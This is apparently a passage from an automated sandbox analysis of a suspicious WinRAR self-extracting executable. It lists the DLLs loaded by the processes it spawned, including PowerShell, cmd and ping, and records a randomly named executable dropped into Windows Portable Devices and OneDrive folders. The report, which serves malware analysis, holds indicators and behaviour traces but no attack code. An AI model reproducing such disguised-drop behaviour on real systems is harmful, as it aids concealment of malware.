Source: C:\RuntimeDll\cef_process.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: ktmw32.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Windows Portable Devices\07a615e8f2b317	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317	Jump to behavior

Source: kBY9lgRaca.exe

Static file information: File size 3589074 > 1048576

Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kBY9lgRaca.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: kBY9lgRaca.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: kBY9lgRaca.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kBY9lgRaca.exe
Source:	Binary string: 5c561934e089\System.pdbigab source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb# source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001BA2E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7..pDb source: cef_process.exe, 00000008.00000002.1629531486.00007FFAACE40000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .0__b77a5c561934e089\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.PDB source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C803000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb_9 source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmp

Source: kBY9lgRaca.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kBY9lgRaca.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kBY9lgRaca.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kBY9lgRaca.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kBY9lgRaca.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

File created: C:\RuntimeDll\__tmp_rar_sfx_access_check_4469328

Jump to behavior

Source: kBY9lgRaca.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCF640 push ecx; ret	0_2_00CCF653
